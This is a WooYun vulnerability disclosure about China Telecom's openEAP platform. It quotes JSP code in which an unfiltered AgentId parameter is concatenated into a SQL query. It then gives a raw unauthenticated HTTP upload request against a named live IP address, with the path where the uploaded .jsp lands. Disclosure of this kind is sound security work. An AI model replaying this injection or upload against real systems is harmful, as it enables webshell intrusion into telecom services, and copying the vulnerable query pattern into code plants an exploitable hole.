乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-02: 细节已通知厂商并且等待厂商处理中 2014-09-07: 厂商已经确认,细节仅向厂商公开 2014-09-10: 细节向第三方安全合作伙伴开放 2014-11-01: 细节向核心白帽子及相关领域专家公开 2014-11-11: 细节向普通白帽子公开 2014-11-21: 细节向实习白帽子公开 2014-12-01: 细节向公众公开
中国电信openEAP通用注入漏洞,影响电信全国很多系统
中国电信openEAP的agent.war包下app\enterprise\AgentInfo.jsp页面,末对参数进行过滤,导致注入漏洞。
<% String AId = request.getParameter("AgentId"); //获取AgentID参数 if(AId == null) AId = ""; String AutoAnswer = "true"; String MusicAlert = "true"; String MonitorType = "0"; String MonitorObject = "1"; String WorkService = ""; String AgentRole = "101"; String CallOutLimited = ""; String EntIdList = ""; String EntNameList = ""; if(!AId.equals("")) { //查询坐席工号是否存在 QueryHelper qh = new QueryHelper(); String sql = "SELECT * FROM SYS_AGENT WHERE AGENTID = '" + AId + "'"; //末过滤带入查询 List list = qh.executeQuery(sql); //查询 if(list.size() > 0) { RowModel row = (RowModel)list.get(0); AutoAnswer = row.getColumnValue("AutoAnswer"); MusicAlert = row.getColumnValue("MusicAlert"); MonitorType = row.getColumnValue("MonitorType"); MonitorObject = row.getColumnValue("MonitorObject"); WorkService = row.getColumnValue("WorkService"); AgentRole = row.getColumnValue("Free1"); CallOutLimited = row.getColumnValue("Free2"); EntIdList = row.getColumnValue("Free3"); EntNameList = row.getColumnValue("Free4"); } }%>
数据库:sybase。
截图:
另外提下,这套系统其实不需要登录。就可以getwebshell这个不知道为什么要爆破额。 WooYun: 电信某省客服系统弱口令泄漏各种信息 无需登录上传点:
POST /info/servletinfo?funcid=upload HTTP/1.1Host: 202.99.225.35:9080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://202.99.225.35:9080/info/maintain/display.jsp?dsName=whinfo_ds&infoId=10&&Code=Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------184676857810583403552066782031Content-Length: 352-----------------------------184676857810583403552066782031Content-Disposition: form-data; name="funcid"-----------------------------184676857810583403552066782031Content-Disposition: form-data; name="tt"; filename="wooyun.jsp"Content-Type: application/octet-streamtest-----------------------------184676857810583403552066782031--
上传后的路径:/suntek_eap_info_file_dir/attach/public/wooyun.jsp
过滤加权限验证
危害等级:高
漏洞Rank:18
确认时间:2014-09-07 09:26
暂无